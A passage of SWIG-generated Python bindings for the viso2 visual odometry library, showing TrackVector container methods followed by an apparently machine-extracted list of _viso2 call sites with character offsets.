__getitem__(self, slice) -> TrackVector
__getitem__(self, i) -> track
"""
return _viso2.TrackVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.TrackVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> track"""
return _viso2.TrackVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.TrackVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.TrackVector_empty(self)
def size(self):
"""size(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.TrackVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Reconstruction::track >::iterator"""
return _viso2.TrackVector_begin(self)
def end(self):
"""end(self) -> std::vector< Reconstruction::track >::iterator"""
return _viso2.TrackVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Reconstruction::track >::reverse_iterator"""
return _viso2.TrackVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Reconstruction::track >::reverse_iterator"""
return _viso2.TrackVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.TrackVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Reconstruction::track >::allocator_type"""
return _viso2.TrackVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.TrackVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Reconstruction::track >::iterator
erase(self, first, last) -> std::vector< Reconstruction::track >::iterator
"""
return _viso2.TrackVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> TrackVector
__init__(self, arg2) -> TrackVector
__init__(self, size) -> TrackVector
__init__(self, size, value) -> TrackVector
"""
this = _viso2.new_TrackVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.TrackVector_push_back(self, x)
def front(self):
"""front(self) -> track"""
return _viso2.TrackVector_front(self)
def back(self):
"""back(self) -> track"""
return _viso2.TrackVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.TrackVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.TrackVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Reconstruction::track >::iterator
insert(self, pos, n, x)
"""
return _viso2.TrackVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.TrackVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector_capacity(self)
__swig_destroy__ = _viso2.delete_TrackVector
__del__ = lambda self: None
TrackVector_swigregister = _viso2.TrackVector_swigregister
TrackVector_swigregister(TrackVector)
# This file is compatible with both classic and new-style classes.
| [((26063, 26083), '_viso2.Matrix_eye', '_viso2.Matrix_eye', (['m'], {}), '(m)\n', (26080, 26083), False, 'import _viso2\n'), ((26151, 26172), '_viso2.Matrix_diag', '_viso2.Matrix_diag', (['M'], {}), '(M)\n', (26169, 26172), False, 'import _viso2\n'), ((26258, 26288), '_viso2.Matrix_reshape', '_viso2.Matrix_reshape', (['M', 'm', 'n'], {}), '(M, m, n)\n', (26279, 26288), False, 'import _viso2\n'), ((26370, 26398), '_viso2.Matrix_rotMatX', '_viso2.Matrix_rotMatX', (['angle'], {}), '(angle)\n', (26391, 26398), False, 'import _viso2\n'), ((26480, 26508), '_viso2.Matrix_rotMatY', '_viso2.Matrix_rotMatY', (['angle'], {}), '(angle)\n', (26501, 26508), False, 'import _viso2\n'), ((26590, 26618), '_viso2.Matrix_rotMatZ', '_viso2.Matrix_rotMatZ', (['angle'], {}), '(angle)\n', (26611, 26618), False, 'import _viso2\n'), ((26694, 26719), '_viso2.Matrix_cross', '_viso2.Matrix_cross', (['a', 'b'], {}), '(a, b)\n', (26713, 26719), False, 'import _viso2\n'), ((26785, 26805), '_viso2.Matrix_inv', '_viso2.Matrix_inv', (['M'], {}), '(M)\n', (26802, 26805), False, 'import _viso2\n'), ((3477, 3510), '_viso2.SwigPyIterator_value', '_viso2.SwigPyIterator_value', (['self'], {}), '(self)\n', (3504, 3510), False, 'import _viso2\n'), ((3656, 3691), '_viso2.SwigPyIterator_incr', '_viso2.SwigPyIterator_incr', (['self', 'n'], {}), '(self, n)\n', (3682, 3691), False, 'import _viso2\n'), ((3837, 3872), '_viso2.SwigPyIterator_decr', '_viso2.SwigPyIterator_decr', (['self', 'n'], {}), '(self, n)\n', (3863, 3872), False, 'import _viso2\n'), ((3962, 4001), '_viso2.SwigPyIterator_distance', '_viso2.SwigPyIterator_distance', (['self', 'x'], {}), '(self, x)\n', (3992, 4001), False, 'import _viso2\n'), ((4080, 4116), '_viso2.SwigPyIterator_equal', '_viso2.SwigPyIterator_equal', (['self', 'x'], {}), '(self, x)\n', (4107, 4116), False, 'import _viso2\n'), ((4197, 4229), '_viso2.SwigPyIterator_copy', '_viso2.SwigPyIterator_copy', (['self'], {}), '(self)\n', (4223, 4229), False, 'import _viso2\n'), ((4306, 4338), '_viso2.SwigPyIterator_next', '_viso2.SwigPyIterator_next', (['self'], {}), '(self)\n', (4332, 4338), False, 'import _viso2\n'), ((4423, 4459), '_viso2.SwigPyIterator___next__', '_viso2.SwigPyIterator___next__', (['self'], {}), '(self)\n', (4453, 4459), False, 'import _viso2\n'), ((4544, 4580), '_viso2.SwigPyIterator_previous', '_viso2.SwigPyIterator_previous', (['self'], {}), '(self)\n', (4574, 4580), False, 'import _viso2\n'), ((4673, 4711), '_viso2.SwigPyIterator_advance', '_viso2.SwigPyIterator_advance', (['self', 'n'], {}), '(self, n)\n', (4702, 4711), False, 'import _viso2\n'), ((4792, 4829), '_viso2.SwigPyIterator___eq__', '_viso2.SwigPyIterator___eq__', (['self', 'x'], {}), '(self, x)\n', (4820, 4829), False, 'import _viso2\n'), ((4910, 4947), '_viso2.SwigPyIterator___ne__', '_viso2.SwigPyIterator___ne__', (['self', 'x'], {}), '(self, x)\n', (4938, 4947), False, 'import _viso2\n'), ((5042, 5081), '_viso2.SwigPyIterator___iadd__', '_viso2.SwigPyIterator___iadd__', (['self', 'n'], {}), '(self, n)\n', (5072, 5081), False, 'import _viso2\n'), ((5176, 5215), '_viso2.SwigPyIterator___isub__', '_viso2.SwigPyIterator___isub__', (['self', 'n'], {}), '(self, n)\n', (5206, 5215), False, 'import _viso2\n'), ((5308, 5346), '_viso2.SwigPyIterator___add__', '_viso2.SwigPyIterator___add__', (['self', 'n'], {}), '(self, n)\n', (5337, 5346), False, 'import _viso2\n'), ((5499, 5541), '_viso2.SwigPyIterator___sub__', '_viso2.SwigPyIterator___sub__', (['self', '*args'], {}), '(self, *args)\n', (5528, 5541), False, 'import _viso2\n'), ((6330, 6377), '_viso2.VisualOdometry_process', '_viso2.VisualOdometry_process', (['self', 'p_matched_'], {}), '(self, p_matched_)\n', (6359, 6377), False, 'import _viso2\n'), ((6460, 6497), '_viso2.VisualOdometry_getMotion', '_viso2.VisualOdometry_getMotion', (['self'], {}), '(self)\n', (6491, 6497), False, 'import _viso2\n'), ((6587, 6625), '_viso2.VisualOdometry_getMatches', '_viso2.VisualOdometry_getMatches', (['self'], {}), '(self)\n', (6619, 6625), False, 'import _viso2\n'), ((6727, 6773), '_viso2.VisualOdometry_getNumberOfMatches', '_viso2.VisualOdometry_getNumberOfMatches', (['self'], {}), '(self)\n', (6767, 6773), False, 'import _viso2\n'), ((6875, 6921), '_viso2.VisualOdometry_getNumberOfInliers', '_viso2.VisualOdometry_getNumberOfInliers', (['self'], {}), '(self)\n', (6915, 6921), False, 'import _viso2\n'), ((7060, 7104), '_viso2.VisualOdometry_getInlierIndices', '_viso2.VisualOdometry_getInlierIndices', (['self'], {}), '(self)\n', (7098, 7104), False, 'import _viso2\n'), ((7202, 7247), '_viso2.VisualOdometry_getGain', '_viso2.VisualOdometry_getGain', (['self', 'inliers_'], {}), '(self, inliers_)\n', (7231, 7247), False, 'import _viso2\n'), ((8421, 8445), '_viso2.new_calibration', '_viso2.new_calibration', ([], {}), '()\n', (8443, 8445), False, 'import _viso2\n'), ((9992, 10014), '_viso2.new_bucketing', '_viso2.new_bucketing', ([], {}), '()\n', (10012, 10014), False, 'import _viso2\n'), ((11469, 11495), '_viso2.new_VO_parameters', '_viso2.new_VO_parameters', ([], {}), '()\n', (11493, 11495), False, 'import _viso2\n'), ((12475, 12511), '_viso2.new_VisualOdometryMono', '_viso2.new_VisualOdometryMono', (['param'], {}), '(param)\n', (12504, 12511), False, 'import _viso2\n'), ((12981, 13027), '_viso2.VisualOdometryMono_process', '_viso2.VisualOdometryMono_process', (['self', '*args'], {}), '(self, *args)\n', (13014, 13027), False, 'import _viso2\n'), ((13129, 13177), '_viso2.VisualOdometryMono_getInlierMatches', '_viso2.VisualOdometryMono_getInlierMatches', (['self'], {}), '(self)\n', (13171, 13177), False, 'import _viso2\n'), ((13477, 13529), '_viso2.VisualOdometryMono_process_frame', '_viso2.VisualOdometryMono_process_frame', (['self', '*args'], {}), '(self, *args)\n', (13516, 13529), False, 'import _viso2\n'), ((15790, 15818), '_viso2.new_Mono_parameters', '_viso2.new_Mono_parameters', ([], {}), '()\n', (15816, 15818), False, 'import _viso2\n'), ((16818, 16856), '_viso2.new_VisualOdometryStereo', '_viso2.new_VisualOdometryStereo', (['param'], {}), '(param)\n', (16849, 16856), False, 'import _viso2\n'), ((17277, 17325), '_viso2.VisualOdometryStereo_process', '_viso2.VisualOdometryStereo_process', (['self', '*args'], {}), '(self, *args)\n', (17312, 17325), False, 'import _viso2\n'), ((17546, 17618), '_viso2.VisualOdometryStereo_process_frame', '_viso2.VisualOdometryStereo_process_frame', (['self', 'image1', 'image2', 'replace'], {}), '(self, image1, image2, replace)\n', (17587, 17618), False, 'import _viso2\n'), ((19627, 19657), '_viso2.new_Stereo_parameters', '_viso2.new_Stereo_parameters', ([], {}), '()\n', (19655, 19657), False, 'import _viso2\n'), ((20507, 20531), '_viso2.new_Matrix', '_viso2.new_Matrix', (['*args'], {}), '(*args)\n', (20524, 20531), False, 'import _viso2\n'), ((20804, 20833), '_viso2.Matrix_assign', '_viso2.Matrix_assign', (['self', 'M'], {}), '(self, M)\n', (20824, 20833), False, 'import _viso2\n'), ((21133, 21182), '_viso2.Matrix_getData', '_viso2.Matrix_getData', (['self', 'val_', 'i1', 'j1', 'i2', 'j2'], {}), '(self, val_, i1, j1, i2, j2)\n', (21154, 21182), False, 'import _viso2\n'), ((21406, 21448), '_viso2.Matrix_getMat', '_viso2.Matrix_getMat', (['self', 'i1', 'j1', 'i2', 'j2'], {}), '(self, i1, j1, i2, j2)\n', (21426, 21448), False, 'import _viso2\n'), ((21533, 21568), '_viso2.Matrix_setMat', '_viso2.Matrix_setMat', (['self', 'M', 'i', 'j'], {}), '(self, M, i, j)\n', (21553, 21568), False, 'import _viso2\n'), ((21844, 21889), '_viso2.Matrix_setVal', '_viso2.Matrix_setVal', (['self', 's', 'i1', 'j1', 'i2', 'j2'], {}), '(self, s, i1, j1, i2, j2)\n', (21864, 21889), False, 'import _viso2\n'), ((22064, 22102), '_viso2.Matrix_setDiag', '_viso2.Matrix_setDiag', (['self', 's', 'i1', 'i2'], {}), '(self, s, i1, i2)\n', (22085, 22102), False, 'import _viso2\n'), ((22165, 22189), '_viso2.Matrix_zero', '_viso2.Matrix_zero', (['self'], {}), '(self)\n', (22183, 22189), False, 'import _viso2\n'), ((22286, 22322), '_viso2.Matrix_extractCols', '_viso2.Matrix_extractCols', (['self', 'idx'], {}), '(self, idx)\n', (22311, 22322), False, 'import _viso2\n'), ((22387, 22407), '_viso2.Matrix_eye', '_viso2.Matrix_eye', (['m'], {}), '(m)\n', (22404, 22407), False, 'import _viso2\n'), ((22506, 22534), '_viso2.Matrix_identity', '_viso2.Matrix_identity', (['self'], {}), '(self)\n', (22528, 22534), False, 'import _viso2\n'), ((22601, 22622), '_viso2.Matrix_diag', '_viso2.Matrix_diag', (['M'], {}), '(M)\n', (22619, 22622), False, 'import _viso2\n'), ((22737, 22767), '_viso2.Matrix_reshape', '_viso2.Matrix_reshape', (['M', 'm', 'n'], {}), '(M, m, n)\n', (22758, 22767), False, 'import _viso2\n'), ((22884, 22912), '_viso2.Matrix_rotMatX', '_viso2.Matrix_rotMatX', (['angle'], {}), '(angle)\n', (22905, 22912), False, 'import _viso2\n'), ((23029, 23057), '_viso2.Matrix_rotMatY', '_viso2.Matrix_rotMatY', (['angle'], {}), '(angle)\n', (23050, 23057), False, 'import _viso2\n'), ((23174, 23202), '_viso2.Matrix_rotMatZ', '_viso2.Matrix_rotMatZ', (['angle'], {}), '(angle)\n', (23195, 23202), False, 'import _viso2\n'), ((23323, 23353), '_viso2.Matrix___add__', '_viso2.Matrix___add__', (['self', 'M'], {}), '(self, M)\n', (23344, 23353), False, 'import _viso2\n'), ((23438, 23468), '_viso2.Matrix___sub__', '_viso2.Matrix___sub__', (['self', 'M'], {}), '(self, M)\n', (23459, 23468), False, 'import _viso2\n'), ((23610, 23644), '_viso2.Matrix___mul__', '_viso2.Matrix___mul__', (['self', '*args'], {}), '(self, *args)\n', (23631, 23644), False, 'import _viso2\n'), ((23696, 23734), '_viso2.Matrix___truediv__', '_viso2.Matrix___truediv__', (['self', '*args'], {}), '(self, *args)\n', (23721, 23734), False, 'import _viso2\n'), ((23840, 23867), '_viso2.Matrix___neg__', '_viso2.Matrix___neg__', (['self'], {}), '(self)\n', (23861, 23867), False, 'import _viso2\n'), ((23952, 23982), '_viso2.Matrix___invert__', '_viso2.Matrix___invert__', (['self'], {}), '(self)\n', (23976, 23982), False, 'import _viso2\n'), ((24058, 24084), '_viso2.Matrix_l2norm', '_viso2.Matrix_l2norm', (['self'], {}), '(self)\n', (24078, 24084), False, 'import _viso2\n'), ((24156, 24180), '_viso2.Matrix_mean', '_viso2.Matrix_mean', (['self'], {}), '(self)\n', (24174, 24180), False, 'import _viso2\n'), ((24255, 24280), '_viso2.Matrix_cross', '_viso2.Matrix_cross', (['a', 'b'], {}), '(a, b)\n', (24274, 24280), False, 'import _viso2\n'), ((24377, 24397), '_viso2.Matrix_inv', '_viso2.Matrix_inv', (['M'], {}), '(M)\n', (24394, 24397), False, 'import _viso2\n'), ((24508, 24538), '_viso2.Matrix_setInverse', '_viso2.Matrix_setInverse', (['self'], {}), '(self)\n', (24532, 24538), False, 'import _viso2\n'), ((24608, 24631), '_viso2.Matrix_det', '_viso2.Matrix_det', (['self'], {}), '(self)\n', (24625, 24631), False, 'import _viso2\n'), ((24781, 24814), '_viso2.Matrix_solve', '_viso2.Matrix_solve', (['self', 'M', 'eps'], {}), '(self, M, eps)\n', (24800, 24814), False, 'import _viso2\n'), ((24970, 25005), '_viso2.Matrix_lu', '_viso2.Matrix_lu', (['self', 'idx', 'd', 'eps'], {}), '(self, idx, d, eps)\n', (24986, 25005), False, 'import _viso2\n'), ((25084, 25116), '_viso2.Matrix_svd', '_viso2.Matrix_svd', (['self', 'U', 'W', 'V'], {}), '(self, U, W, V)\n', (25101, 25116), False, 'import _viso2\n'), ((25781, 25808), '_viso2.Matrix___str__', '_viso2.Matrix___str__', (['self'], {}), '(self)\n', (25802, 25808), False, 'import _viso2\n'), ((25887, 25919), '_viso2.Matrix_toNumpy', '_viso2.Matrix_toNumpy', (['self', 'mat'], {}), '(self, mat)\n', (25908, 25919), False, 'import _viso2\n'), ((27206, 27231), '_viso2.new_Matcher', '_viso2.new_Matcher', (['param'], {}), '(param)\n', (27224, 27231), False, 'import _viso2\n'), ((27537, 27588), '_viso2.Matcher_setIntrinsics', '_viso2.Matcher_setIntrinsics', (['self', 'f', 'cu', 'cv', 'base'], {}), '(self, f, cu, cv, base)\n', (27565, 27588), False, 'import _viso2\n'), ((27769, 27821), '_viso2.Matcher_matchFeatures', '_viso2.Matcher_matchFeatures', (['self', 'method', 'Tr_delta'], {}), '(self, method, Tr_delta)\n', (27797, 27821), False, 'import _viso2\n'), ((27990, 28068), '_viso2.Matcher_bucketFeatures', '_viso2.Matcher_bucketFeatures', (['self', 'max_features', 'bucket_width', 'bucket_height'], {}), '(self, max_features, bucket_width, bucket_height)\n', (28019, 28068), False, 'import _viso2\n'), ((28158, 28189), '_viso2.Matcher_getMatches', '_viso2.Matcher_getMatches', (['self'], {}), '(self)\n', (28183, 28189), False, 'import _viso2\n'), ((28285, 28322), '_viso2.Matcher_getGain', '_viso2.Matcher_getGain', (['self', 'inliers'], {}), '(self, inliers)\n', (28307, 28322), False, 'import _viso2\n'), ((28653, 28689), '_viso2.Matcher_pushBack', '_viso2.Matcher_pushBack', (['self', '*args'], {}), '(self, *args)\n', (28676, 28689), False, 'import _viso2\n'), ((33456, 33487), '_viso2.new_Matcher_parameters', '_viso2.new_Matcher_parameters', ([], {}), '()\n', (33485, 33487), False, 'import _viso2\n'), ((36814, 36839), '_viso2.new_p_match', '_viso2.new_p_match', (['*args'], {}), '(*args)\n', (36832, 36839), False, 'import _viso2\n'), ((37534, 37561), '_viso2.new_Reconstruction', '_viso2.new_Reconstruction', ([], {}), '()\n', (37559, 37561), False, 'import _viso2\n'), ((37864, 37917), '_viso2.Reconstruction_setCalibration', '_viso2.Reconstruction_setCalibration', (['self', 'f', 'cu', 'cv'], {}), '(self, f, cu, cv)\n', (37900, 37917), False, 'import _viso2\n'), ((38391, 38495), '_viso2.Reconstruction_update', '_viso2.Reconstruction_update', (['self', 'p_matched', 'Tr', 'point_type', 'min_track_length', 'max_dist', 'min_angle'], {}), '(self, p_matched, Tr, point_type,\n min_track_length, max_dist, min_angle)\n', (38419, 38495), False, 'import _viso2\n'), ((38581, 38618), '_viso2.Reconstruction_getPoints', '_viso2.Reconstruction_getPoints', (['self'], {}), '(self)\n', (38612, 38618), False, 'import _viso2\n'), ((38706, 38743), '_viso2.Reconstruction_getTracks', '_viso2.Reconstruction_getTracks', (['self'], {}), '(self)\n', (38737, 38743), False, 'import _viso2\n'), ((39903, 39928), '_viso2.new_point3d', '_viso2.new_point3d', (['*args'], {}), '(*args)\n', (39921, 39928), False, 'import _viso2\n'), ((41055, 41080), '_viso2.new_point2d', '_viso2.new_point2d', (['*args'], {}), '(*args)\n', (41073, 41080), False, 'import _viso2\n'), ((43108, 43126), '_viso2.new_track', '_viso2.new_track', ([], {}), '()\n', (43124, 43126), False, 'import _viso2\n'), ((43819, 43852), '_viso2.MatchVector_iterator', '_viso2.MatchVector_iterator', (['self'], {}), '(self)\n', (43846, 43852), False, 'import _viso2\n'), ((43992, 44028), '_viso2.MatchVector___nonzero__', '_viso2.MatchVector___nonzero__', (['self'], {}), '(self)\n', (44022, 44028), False, 'import _viso2\n'), ((44107, 44140), '_viso2.MatchVector___bool__', '_viso2.MatchVector___bool__', (['self'], {}), '(self)\n', (44134, 44140), False, 'import _viso2\n'), ((44255, 44287), '_viso2.MatchVector___len__', '_viso2.MatchVector___len__', (['self'], {}), '(self)\n', (44281, 44287), False, 'import _viso2\n'), ((44393, 44436), '_viso2.MatchVector___getslice__', '_viso2.MatchVector___getslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (44424, 44436), False, 'import _viso2\n'), ((44582, 44626), '_viso2.MatchVector___setslice__', '_viso2.MatchVector___setslice__', (['self', '*args'], {}), '(self, *args)\n', (44613, 44626), False, 'import _viso2\n'), ((44717, 44760), '_viso2.MatchVector___delslice__', '_viso2.MatchVector___delslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (44748, 44760), False, 'import _viso2\n'), ((44898, 44941), '_viso2.MatchVector___delitem__', '_viso2.MatchVector___delitem__', (['self', '*args'], {}), '(self, *args)\n', (44928, 44941), False, 'import _viso2\n'), ((45105, 45148), '_viso2.MatchVector___getitem__', '_viso2.MatchVector___getitem__', (['self', '*args'], {}), '(self, *args)\n', (45135, 45148), False, 'import _viso2\n'), ((45325, 45368), '_viso2.MatchVector___setitem__', '_viso2.MatchVector___setitem__', (['self', '*args'], {}), '(self, *args)\n', (45355, 45368), False, 'import _viso2\n'), ((45440, 45468), '_viso2.MatchVector_pop', '_viso2.MatchVector_pop', (['self'], {}), '(self)\n', (45462, 45468), False, 'import _viso2\n'), ((45541, 45575), '_viso2.MatchVector_append', '_viso2.MatchVector_append', (['self', 'x'], {}), '(self, x)\n', (45566, 45575), False, 'import _viso2\n'), ((45648, 45678), '_viso2.MatchVector_empty', '_viso2.MatchVector_empty', (['self'], {}), '(self)\n', (45672, 45678), False, 'import _viso2\n'), ((45787, 45816), '_viso2.MatchVector_size', '_viso2.MatchVector_size', (['self'], {}), '(self)\n', (45810, 45816), False, 'import _viso2\n'), ((45885, 45917), '_viso2.MatchVector_swap', '_viso2.MatchVector_swap', (['self', 'v'], {}), '(self, v)\n', (45908, 45917), False, 'import _viso2\n'), ((46027, 46057), '_viso2.MatchVector_begin', '_viso2.MatchVector_begin', (['self'], {}), '(self)\n', (46051, 46057), False, 'import _viso2\n'), ((46163, 46191), '_viso2.MatchVector_end', '_viso2.MatchVector_end', (['self'], {}), '(self)\n', (46185, 46191), False, 'import _viso2\n'), ((46311, 46342), '_viso2.MatchVector_rbegin', '_viso2.MatchVector_rbegin', (['self'], {}), '(self)\n', (46336, 46342), False, 'import _viso2\n'), ((46458, 46487), '_viso2.MatchVector_rend', '_viso2.MatchVector_rend', (['self'], {}), '(self)\n', (46481, 46487), False, 'import _viso2\n'), ((46552, 46582), '_viso2.MatchVector_clear', '_viso2.MatchVector_clear', (['self'], {}), '(self)\n', (46576, 46582), False, 'import _viso2\n'), ((46714, 46752), '_viso2.MatchVector_get_allocator', '_viso2.MatchVector_get_allocator', (['self'], {}), '(self)\n', (46746, 46752), False, 'import _viso2\n'), ((46823, 46856), '_viso2.MatchVector_pop_back', '_viso2.MatchVector_pop_back', (['self'], {}), '(self)\n', (46850, 46856), False, 'import _viso2\n'), ((47074, 47111), '_viso2.MatchVector_erase', '_viso2.MatchVector_erase', (['self', '*args'], {}), '(self, *args)\n', (47098, 47111), False, 'import _viso2\n'), ((47361, 47390), '_viso2.new_MatchVector', '_viso2.new_MatchVector', (['*args'], {}), '(*args)\n', (47383, 47390), False, 'import _viso2\n'), ((47583, 47620), '_viso2.MatchVector_push_back', '_viso2.MatchVector_push_back', (['self', 'x'], {}), '(self, x)\n', (47611, 47620), False, 'import _viso2\n'), ((47696, 47726), '_viso2.MatchVector_front', '_viso2.MatchVector_front', (['self'], {}), '(self)\n', (47720, 47726), False, 'import _viso2\n'), ((47800, 47829), '_viso2.MatchVector_back', '_viso2.MatchVector_back', (['self'], {}), '(self)\n', (47823, 47829), False, 'import _viso2\n'), ((47908, 47945), '_viso2.MatchVector_assign', '_viso2.MatchVector_assign', (['self', 'n', 'x'], {}), '(self, n, x)\n', (47933, 47945), False, 'import _viso2\n'), ((48081, 48119), '_viso2.MatchVector_resize', '_viso2.MatchVector_resize', (['self', '*args'], {}), '(self, *args)\n', (48106, 48119), False, 'import _viso2\n'), ((48296, 48334), '_viso2.MatchVector_insert', '_viso2.MatchVector_insert', (['self', '*args'], {}), '(self, *args)\n', (48321, 48334), False, 'import _viso2\n'), ((48409, 48444), '_viso2.MatchVector_reserve', '_viso2.MatchVector_reserve', (['self', 'n'], {}), '(self, n)\n', (48435, 48444), False, 'import _viso2\n'), ((48561, 48594), '_viso2.MatchVector_capacity', '_viso2.MatchVector_capacity', (['self'], {}), '(self)\n', (48588, 48594), False, 'import _viso2\n'), ((49216, 49251), '_viso2.Point3dVector_iterator', '_viso2.Point3dVector_iterator', (['self'], {}), '(self)\n', (49245, 49251), False, 'import _viso2\n'), ((49391, 49429), '_viso2.Point3dVector___nonzero__', '_viso2.Point3dVector___nonzero__', (['self'], {}), '(self)\n', (49423, 49429), False, 'import _viso2\n'), ((49508, 49543), '_viso2.Point3dVector___bool__', '_viso2.Point3dVector___bool__', (['self'], {}), '(self)\n', (49537, 49543), False, 'import _viso2\n'), ((49665, 49699), '_viso2.Point3dVector___len__', '_viso2.Point3dVector___len__', (['self'], {}), '(self)\n', (49693, 49699), False, 'import _viso2\n'), ((49807, 49852), '_viso2.Point3dVector___getslice__', '_viso2.Point3dVector___getslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (49840, 49852), False, 'import _viso2\n'), ((49998, 50044), '_viso2.Point3dVector___setslice__', '_viso2.Point3dVector___setslice__', (['self', '*args'], {}), '(self, *args)\n', (50031, 50044), False, 'import _viso2\n'), ((50135, 50180), '_viso2.Point3dVector___delslice__', '_viso2.Point3dVector___delslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (50168, 50180), False, 'import _viso2\n'), ((50318, 50363), '_viso2.Point3dVector___delitem__', '_viso2.Point3dVector___delitem__', (['self', '*args'], {}), '(self, *args)\n', (50350, 50363), False, 'import _viso2\n'), ((50529, 50574), '_viso2.Point3dVector___getitem__', '_viso2.Point3dVector___getitem__', (['self', '*args'], {}), '(self, *args)\n', (50561, 50574), False, 'import _viso2\n'), ((50751, 50796), '_viso2.Point3dVector___setitem__', '_viso2.Point3dVector___setitem__', (['self', '*args'], {}), '(self, *args)\n', (50783, 50796), False, 'import _viso2\n'), ((50868, 50898), '_viso2.Point3dVector_pop', '_viso2.Point3dVector_pop', (['self'], {}), '(self)\n', (50892, 50898), False, 'import _viso2\n'), ((50971, 51007), '_viso2.Point3dVector_append', '_viso2.Point3dVector_append', (['self', 'x'], {}), '(self, x)\n', (50998, 51007), False, 'import _viso2\n'), ((51080, 51112), '_viso2.Point3dVector_empty', '_viso2.Point3dVector_empty', (['self'], {}), '(self)\n', (51106, 51112), False, 'import _viso2\n'), ((51228, 51259), '_viso2.Point3dVector_size', '_viso2.Point3dVector_size', (['self'], {}), '(self)\n', (51253, 51259), False, 'import _viso2\n'), ((51328, 51362), '_viso2.Point3dVector_swap', '_viso2.Point3dVector_swap', (['self', 'v'], {}), '(self, v)\n', (51353, 51362), False, 'import _viso2\n'), ((51479, 51511), '_viso2.Point3dVector_begin', '_viso2.Point3dVector_begin', (['self'], {}), '(self)\n', (51505, 51511), False, 'import _viso2\n'), ((51624, 51654), '_viso2.Point3dVector_end', '_viso2.Point3dVector_end', (['self'], {}), '(self)\n', (51648, 51654), False, 'import _viso2\n'), ((51781, 51814), '_viso2.Point3dVector_rbegin', '_viso2.Point3dVector_rbegin', (['self'], {}), '(self)\n', (51808, 51814), False, 'import _viso2\n'), ((51937, 51968), '_viso2.Point3dVector_rend', '_viso2.Point3dVector_rend', (['self'], {}), '(self)\n', (51962, 51968), False, 'import _viso2\n'), ((52033, 52065), '_viso2.Point3dVector_clear', '_viso2.Point3dVector_clear', (['self'], {}), '(self)\n', (52059, 52065), False, 'import _viso2\n'), ((52204, 52244), '_viso2.Point3dVector_get_allocator', '_viso2.Point3dVector_get_allocator', (['self'], {}), '(self)\n', (52238, 52244), False, 'import _viso2\n'), ((52315, 52350), '_viso2.Point3dVector_pop_back', '_viso2.Point3dVector_pop_back', (['self'], {}), '(self)\n', (52344, 52350), False, 'import _viso2\n'), ((52582, 52621), '_viso2.Point3dVector_erase', '_viso2.Point3dVector_erase', (['self', '*args'], {}), '(self, *args)\n', (52608, 52621), False, 'import _viso2\n'), ((52879, 52910), '_viso2.new_Point3dVector', '_viso2.new_Point3dVector', (['*args'], {}), '(*args)\n', (52903, 52910), False, 'import _viso2\n'), ((53103, 53142), '_viso2.Point3dVector_push_back', '_viso2.Point3dVector_push_back', (['self', 'x'], {}), '(self, x)\n', (53133, 53142), False, 'import _viso2\n'), ((53218, 53250), '_viso2.Point3dVector_front', '_viso2.Point3dVector_front', (['self'], {}), '(self)\n', (53244, 53250), False, 'import _viso2\n'), ((53324, 53355), '_viso2.Point3dVector_back', '_viso2.Point3dVector_back', (['self'], {}), '(self)\n', (53349, 53355), False, 'import _viso2\n'), ((53434, 53473), '_viso2.Point3dVector_assign', '_viso2.Point3dVector_assign', (['self', 'n', 'x'], {}), '(self, n, x)\n', (53461, 53473), False, 'import _viso2\n'), ((53609, 53649), '_viso2.Point3dVector_resize', '_viso2.Point3dVector_resize', (['self', '*args'], {}), '(self, *args)\n', (53636, 53649), False, 'import _viso2\n'), ((53833, 53873), '_viso2.Point3dVector_insert', '_viso2.Point3dVector_insert', (['self', '*args'], {}), '(self, *args)\n', (53860, 53873), False, 'import _viso2\n'), ((53948, 53985), '_viso2.Point3dVector_reserve', '_viso2.Point3dVector_reserve', (['self', 'n'], {}), '(self, n)\n', (53976, 53985), False, 'import _viso2\n'), ((54109, 54144), '_viso2.Point3dVector_capacity', '_viso2.Point3dVector_capacity', (['self'], {}), '(self)\n', (54138, 54144), False, 'import _viso2\n'), ((54768, 54801), '_viso2.TrackVector_iterator', '_viso2.TrackVector_iterator', (['self'], {}), '(self)\n', (54795, 54801), False, 'import _viso2\n'), ((54941, 54977), '_viso2.TrackVector___nonzero__', '_viso2.TrackVector___nonzero__', (['self'], {}), '(self)\n', (54971, 54977), False, 'import _viso2\n'), ((55056, 55089), '_viso2.TrackVector___bool__', '_viso2.TrackVector___bool__', (['self'], {}), '(self)\n', (55083, 55089), False, 'import _viso2\n'), ((55209, 55241), '_viso2.TrackVector___len__', '_viso2.TrackVector___len__', (['self'], {}), '(self)\n', (55235, 55241), False, 'import _viso2\n'), ((55347, 55390), '_viso2.TrackVector___getslice__', '_viso2.TrackVector___getslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (55378, 55390), False, 'import _viso2\n'), ((55536, 55580), '_viso2.TrackVector___setslice__', '_viso2.TrackVector___setslice__', (['self', '*args'], {}), '(self, *args)\n', (55567, 55580), False, 'import _viso2\n'), ((55671, 55714), '_viso2.TrackVector___delslice__', 